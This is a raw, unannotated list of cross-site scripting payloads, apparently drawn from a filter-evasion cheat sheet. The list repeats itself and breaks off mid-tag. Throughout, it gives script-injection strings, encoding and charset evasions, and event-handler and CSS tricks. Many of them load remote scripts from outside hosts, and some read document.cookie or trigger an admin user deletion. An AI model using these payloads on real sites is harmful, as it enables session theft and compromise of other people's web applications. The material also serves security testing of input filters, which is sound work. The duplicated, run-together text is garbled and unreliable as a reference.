alert(123); alert(“XSS”); alert(123) alert(“hellox worldss”); alert(“XSS”)  alert(“XSS”); alert(‘XSS’) “>alert(“XSS”) alert(/XSS”) alert(/XSS/) alert(1) ‘; alert(1); ‘)alert(1);// alert(1)                {font-family&colon;”  <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"  alert&lpar;1&rpar; {Opera}  <img/src=`%00` onerror=this.onerror=confirm(1)  <isindex formaction="javascript&colon;confirm(1)"  <img src=`%00`&NewLine; onerror=alert(1)&NewLine;    prompt(1)</ScRipT giveanswerhere=?    /*%00*/alert(1)/*%00*/</script /*%00*/  ">%00  <iframe/src="data:text/html,”>    </script  <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}     <a href=X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) alert(“XSS”)”> <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") “>’>alert(String.fromCharCode(88,83,83)) ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> <alert(“XSS”);//< “>’>alert(String.fromCharCode(88,83,83)) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search alert(“hellox worldss”)&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 alert(“XSS”);&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//–>”>’>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search hellox worldss … lol <!– <img src=" alert(1)”> alert(1)”> alert(1)”> alert(1)’>”> alert(1)”> alert(123)”> LOL LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;} ({0:#0=alert/#0#/#0#(0)}) LOLalert(123) <SCRIPT>alert(/XSS/.source)</SCRIPT> \\”;alert(‘XSS’);// </TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT> <INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(‘XSS’);\”> <BODY BACKGROUND=\”javascript:alert(‘XSS’)\”> <BODY ONLOAD=alert(‘XSS’)> <IMG DYNSRC=\”javascript:alert(‘XSS’)\”> <IMG LOWSRC=\”javascript:alert(‘XSS’)\”> <BGSOUND SRC=\”javascript:alert(‘XSS’);\”> <BR SIZE=\”\”> <LAYER SRC=\”http://ha.ckers.org/scriptlet.html\”></LAYER> <LINK REL=\”stylesheet\” HREF=\”javascript:alert(‘XSS’);\”> <LINK REL=\”stylesheet\” HREF=\”http://ha.ckers.org/xss.css\”> <STYLE>@import’http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\”Link\” Content=\”<http://ha.ckers.org/xss.css>; REL=stylesheet\”> <STYLE>BODY{-moz-binding:url(\”http://ha.ckers.org/xssmoz.xml#xss\”)}</STYLE> <XSS STYLE=\”behavior: url(xss.htc);\”> <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS <IMG SRC=’vbscript:msgbox(\”XSS\”)’> <IMG SRC=\”mocha:[code]\”> <IMG SRC=\”livescript:[code]\”> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\” <IFRAME SRC=\”javascript:alert(‘XSS’);\”></IFRAME> <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET> <TABLE BACKGROUND=\”javascript:alert(‘XSS’)\”> <TABLE><TD BACKGROUND=\”javascript:alert(‘XSS’)\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”width: expression(alert(‘XSS’));\”> <STYLE>@im\port’\ja\vasc\ript:alert(\”XSS\”)';</STYLE> <IMG STYLE=\”xss:expr/*XSS*/ession(alert(‘XSS’))\”> <XSS STYLE=\”xss:expression(alert(‘XSS’))\”> exp/*<A STYLE=’no\xss:noxss(\”*//*\”); xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))’> <STYLE TYPE=\”text/javascript\”>alert(‘XSS’);</STYLE> <STYLE>.XSS{background-image:url(\”javascript:alert(‘XSS’)\”);}</STYLE><A CLASS=XSS></A> <STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(‘XSS’)\”)}</STYLE> <!–[if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif]–> <BASE HREF=\”javascript:alert(‘XSS’);//\”> <OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http://ha.ckers.org/scriptlet.html\”></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT> <EMBED SRC=\”http://ha.ckers.org/xss.swf\” AllowScriptAccess=\”always\”></EMBED> <EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED> a=\”get\”; b=\”URL(\\”\”; c=\”javascript:\”; d=\”alert(‘XSS’);\\”)\”; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\”xss\” implementation=\”http://ha.ckers.org/xss.htc\”><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(‘XSS’);\”>]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\”xss\”><I><B><IMG SRC=\”javas<!– –>cript:alert(‘XSS’)\”></B></I></XML> <SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN> <XML SRC=\”xsstest.xml\” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”> <?import namespace=\”t\” implementation=\”#default#time2\”> <t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”> </BODY></HTML> <SCRIPT SRC=\”http://ha.ckers.org/xss.jpg\”></SCRIPT> <!–#exec cmd=\”/bin/echo ‘<SCR’\”–><!–#exec cmd=\”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>’\”–> <? echo(‘<SCR)'; echo(‘IPT>alert(\”XSS\”)</SCRIPT>’); ?> <IMG SRC=\”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\”> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>\”> <HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- <SCRIPT a=\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT =\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>\” ” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT \”a=’>’\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=`>` SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>’>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT>document.write(\”<SCRI\”);</SCRIPT>PT SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <A HREF=\”http://66.102.7.147/\”>XSS</A> <A HREF=\”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”>XSS</A> <A HREF=\”http://1113982867/\”>XSS</A> <A HREF=\”http://0x42.0x0000066.0x7.0x93/\”>XSS</A> <A HREF=\”http://0102.0146.0007.00000223/\”>XSS</A> <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A> <A HREF=\”//www.google.com/\”>XSS</A> <A HREF=\”//google\”>XSS</A> <A HREF=\”http://ha.ckers.org@google\”>XSS</A> <A HREF=\”http://google:ha.ckers.org\”>XSS</A> <A HREF=\”http://google.com/\”>XSS</A> <A HREF=\”http://www.google.com./\”>XSS</A> <A HREF=\”javascript:document.location=’http://www.google.com/’\”>XSS</A> <A HREF=\”http://www.gohttp://www.google.com/ogle.com/\”>XSS</A> < %3C &lt < &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 < &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c < < < < < < &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c < < < < < < &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C < < < < < < &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C < < < < < < \x3c \x3C \u003c \u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC=\”javascript:alert(‘XSS’)\” <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\”XSS\”);//<</SCRIPT> <SCRIPT/SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)> <SCRIPT/XSS SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <IMG SRC=\” javascript:alert(‘XSS’);\”> perl -e ‘print \”<SCRIPT>alert(\\”XSS\\”)</SCRIPT>\”;’ > out perl -e ‘print \”<IMG SRC=javascript:alert(\\”XSS\\”)>\”;’ > out <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG \”\”\”><SCRIPT>alert(\”XSS\”)</SCRIPT>\”> <IMG SRC=`javascript:alert(\”RSnake says, ‘XSS’\”)`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=\”javascript:alert(‘XSS’);\”> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> ”;!–\”<XSS>=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//\\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>\”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–“= alert(“XSS”)”> <alert(“XSS”);//< a=/XSS/alert(a.source) \”;alert(‘XSS’);// alert(“XSS”); ¼script¾alert(¢XSS¢)¼/script¾ @im\port’\ja\vasc\ript:alert(“XSS”)'; exp/* a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e); document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> TESTHTML5FORMACTION crosssitespt <!– <img src=" alert(1)”> alert(1)”> alert(1)”> ({0:#0=alert/#0#/#0#(123)}) ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)() {alert(1)};1 crypto.generateCRMFRequest(‘CN=0′,0,0,null,’alert(1)’,384,null,’rsa-dual-use’) alert(1) +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “>alert(document.cookie) “><alert(document.cookie);//< fooalert(document.cookie) <script>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo\’; alert(document.cookie);//’; alert(document.cookie) alert(1) “>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))" title="alert(123); alert(“XSS”); alert(123) alert(“hellox worldss”); alert(“XSS”) alert(“XSS”); alert(‘XSS’) “>alert(“XSS”) alert(/XSS”) alert(/XSS/) alert(1) ‘; alert(1); ‘)alert(1);// alert(1) {font-family&colon;” <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(1) <isindex formaction="javascript&colon;confirm(1)" <img src=`%00`&NewLine; onerror=alert(1)&NewLine; prompt(1)</ScRipT giveanswerhere=? /*%00*/alert(1)/*%00*/</script /*%00*/ ">%00 <iframe/src="data:text/html,”> </script <script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} X X</a http://www.googlealert(document.location)</script XYZ</a <img/src=@ onerror = prompt('1') <style/onload=prompt('XSS') alert(String.fromCharCode(49))</script ^__^ /**/alert(document.location)/**/</script :-( &#00; /***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450′)/***/</script /***/ X alert(0%0) SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) ">{-o-link-source&colon;” OnMouseOver {Firefox & Opera} ^__^ X {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //// /*iframe/src*/<iframe/src=" //|\\ //|\\ </script //|\\ /{src:”/ <plaintext/onmouseover=prompt(1) ”alert(1) {Opera} DIV X On Mouse Over Click Here <% <iframe/src \/\/onload = prompt(1) <iframe/onreadystatechange=alert(1) <svg/onload=alert(1) <input value=<iframe/src=javascript:confirm(1) <input type="text" value=“ X http://www.alert(1)</script .com alert(1) click MsgBox+1 <a href="data:text/html;base64_,”>X</a ~’\u0061′ ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~’\u0061′)</script U+ </script a=\u0061 & /=%2F </script +-+-1-+-+alert(1) /*<script* */alert(1)</script <img src ?itworksonchrome?\/onerror = alert(1) //&NewLine;confirm(1);</script alert(1) ClickMe alert(1) </script 1=2 style=”x:”> <–` –!> x “> CLICKME click Click Me String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41) ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) alert(“XSS”)”> <alert(“XSS”);//< %253cscript%253ealert(1)%253c/script%253e “>alert(document.cookie) fooalert(1) <script>alert(1)</script> <IMG SRC=”javascript:alert(‘XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < javascript:alert("hellox worldss") “>’>alert(String.fromCharCode(88,83,83)) ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(“<SCRI");PT SRC=”http://ha.ckers.org/xss.js”> <alert(“XSS”);//< “>’>alert(String.fromCharCode(88,83,83)) ‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search alert(“hellox worldss”)&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 alert(“XSS”);&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//”;alert(String.fromCharCode?(88,83,83))//\”;alert(String.fromCharCode(88,83,83)%?29//–>”>’>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search hellox worldss … lol <!– <img src=" alert(1)”> alert(1)”> alert(1)”> alert(1)’>”> alert(1)”> alert(123)”> LOL LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;} ({0:#0=alert/#0#/#0#(0)}) LOLalert(123) <SCRIPT>alert(/XSS/.source)</SCRIPT> \\”;alert(‘XSS’);// </TITLE><SCRIPT>alert(\”XSS\”);</SCRIPT> <INPUT TYPE=\”IMAGE\” SRC=\”javascript:alert(‘XSS’);\”> <BODY BACKGROUND=\”javascript:alert(‘XSS’)\”> <BODY ONLOAD=alert(‘XSS’)> <IMG DYNSRC=\”javascript:alert(‘XSS’)\”> <IMG LOWSRC=\”javascript:alert(‘XSS’)\”> <BGSOUND SRC=\”javascript:alert(‘XSS’);\”> <BR SIZE=\”\”> <LAYER SRC=\”http://ha.ckers.org/scriptlet.html\”></LAYER> <LINK REL=\”stylesheet\” HREF=\”javascript:alert(‘XSS’);\”> <LINK REL=\”stylesheet\” HREF=\”http://ha.ckers.org/xss.css\”> <STYLE>@import’http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\”Link\” Content=\”<http://ha.ckers.org/xss.css>; REL=stylesheet\”> <STYLE>BODY{-moz-binding:url(\”http://ha.ckers.org/xssmoz.xml#xss\”)}</STYLE> <XSS STYLE=\”behavior: url(xss.htc);\”> <STYLE>li {list-style-image: url(\”javascript:alert(‘XSS’)\”);}</STYLE><UL><LI>XSS <IMG SRC=’vbscript:msgbox(\”XSS\”)’> <IMG SRC=\”mocha:[code]\”> <IMG SRC=\”livescript:[code]\”> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=javascript:alert(‘XSS’);\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\”> <META HTTP-EQUIV=\”refresh\” CONTENT=\”0; URL=http://;URL=javascript:alert(‘XSS’);\” <IFRAME SRC=\”javascript:alert(‘XSS’);\”></IFRAME> <FRAMESET><FRAME SRC=\”javascript:alert(‘XSS’);\”></FRAMESET> <TABLE BACKGROUND=\”javascript:alert(‘XSS’)\”> <TABLE><TD BACKGROUND=\”javascript:alert(‘XSS’)\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029\”> <DIV STYLE=\”background-image: url(javascript:alert(‘XSS’))\”> <DIV STYLE=\”width: expression(alert(‘XSS’));\”> <STYLE>@im\port’\ja\vasc\ript:alert(\”XSS\”)';</STYLE> <IMG STYLE=\”xss:expr/*XSS*/ession(alert(‘XSS’))\”> <XSS STYLE=\”xss:expression(alert(‘XSS’))\”> exp/*<A STYLE=’no\xss:noxss(\”*//*\”); xss:ex/*XSS*//*/*/pression(alert(\”XSS\”))’> <STYLE TYPE=\”text/javascript\”>alert(‘XSS’);</STYLE> <STYLE>.XSS{background-image:url(\”javascript:alert(‘XSS’)\”);}</STYLE><A CLASS=XSS></A> <STYLE type=\”text/css\”>BODY{background:url(\”javascript:alert(‘XSS’)\”)}</STYLE> <!–[if gte IE 4]> <SCRIPT>alert(‘XSS’);</SCRIPT> <![endif]–> <BASE HREF=\”javascript:alert(‘XSS’);//\”> <OBJECT TYPE=\”text/x-scriptlet\” DATA=\”http://ha.ckers.org/scriptlet.html\”></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT> <EMBED SRC=\”http://ha.ckers.org/xss.swf\” AllowScriptAccess=\”always\”></EMBED> <EMBED SRC=\”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\” type=\”image/svg+xml\” AllowScriptAccess=\”always\”></EMBED> a=\”get\”; b=\”URL(\\”\”; c=\”javascript:\”; d=\”alert(‘XSS’);\\”)\”; eval(a+b+c+d); <HTML xmlns:xss><?import namespace=\”xss\” implementation=\”http://ha.ckers.org/xss.htc\”><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC=\”javas]]><![CDATA[cript:alert(‘XSS’);\”>]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID=\”xss\”><I><B><IMG SRC=\”javas<!– –>cript:alert(‘XSS’)\”></B></I></XML> <SPAN DATASRC=\”#xss\” DATAFLD=\”B\” DATAFORMATAS=\”HTML\”></SPAN> <XML SRC=\”xsstest.xml\” ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix=\”t\” ns=\”urn:schemas-microsoft-com:time\”> <?import namespace=\”t\” implementation=\”#default#time2\”> <t:set attributeName=\”innerHTML\” to=\”XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\”> </BODY></HTML> <SCRIPT SRC=\”http://ha.ckers.org/xss.jpg\”></SCRIPT> <!–#exec cmd=\”/bin/echo ‘<SCR’\”–><!–#exec cmd=\”/bin/echo ‘IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>’\”–> <? echo(‘<SCR)'; echo(‘IPT>alert(\”XSS\”)</SCRIPT>’); ?> <IMG SRC=\”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\”> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV=\”Set-Cookie\” Content=\”USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>\”> <HEAD><META HTTP-EQUIV=\”CONTENT-TYPE\” CONTENT=\”text/html; charset=UTF-7\”> </HEAD>+ADw-SCRIPT+AD4-alert(‘XSS’);+ADw-/SCRIPT+AD4- <SCRIPT a=\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT =\”>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>\” ” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT \”a=’>’\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=`>` SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT a=\”>’>\” SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <SCRIPT>document.write(\”<SCRI\”);</SCRIPT>PT SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <A HREF=\”http://66.102.7.147/\”>XSS</A> <A HREF=\”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\”>XSS</A> <A HREF=\”http://1113982867/\”>XSS</A> <A HREF=\”http://0x42.0x0000066.0x7.0x93/\”>XSS</A> <A HREF=\”http://0102.0146.0007.00000223/\”>XSS</A> <A HREF=\”htt p://6 6.000146.0x7.147/\”>XSS</A> <A HREF=\”//www.google.com/\”>XSS</A> <A HREF=\”//google\”>XSS</A> <A HREF=\”http://ha.ckers.org@google\”>XSS</A> <A HREF=\”http://google:ha.ckers.org\”>XSS</A> <A HREF=\”http://google.com/\”>XSS</A> <A HREF=\”http://www.google.com./\”>XSS</A> <A HREF=\”javascript:document.location=’http://www.google.com/’\”>XSS</A> <A HREF=\”http://www.gohttp://www.google.com/ogle.com/\”>XSS</A> < %3C &lt < &LT &LT; &#60 &#060 &#0060 &#00060 &#000060 &#0000060 < &#x3c &#x03c &#x003c &#x0003c &#x00003c &#x000003c < < < < < < &#X3c &#X03c &#X003c &#X0003c &#X00003c &#X000003c < < < < < < &#x3C &#x03C &#x003C &#x0003C &#x00003C &#x000003C < < < < < < &#X3C &#X03C &#X003C &#X0003C &#X00003C &#X000003C < < < < < < \x3c \x3C \u003c \u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC=\”javascript:alert(‘XSS’)\” <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert(\”XSS\”);//<</SCRIPT> <SCRIPT/SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\”XSS\”)> <SCRIPT/XSS SRC=\”http://ha.ckers.org/xss.js\”></SCRIPT> <IMG SRC=\” javascript:alert(‘XSS’);\”> perl -e ‘print \”<SCRIPT>alert(\\”XSS\\”)</SCRIPT>\”;’ > out perl -e ‘print \”<IMG SRC=javascript:alert(\\”XSS\\”)>\”;’ > out <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=\”jav ascript:alert(‘XSS’);\”> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=javascript:alert(‘XSS’)> <IMG 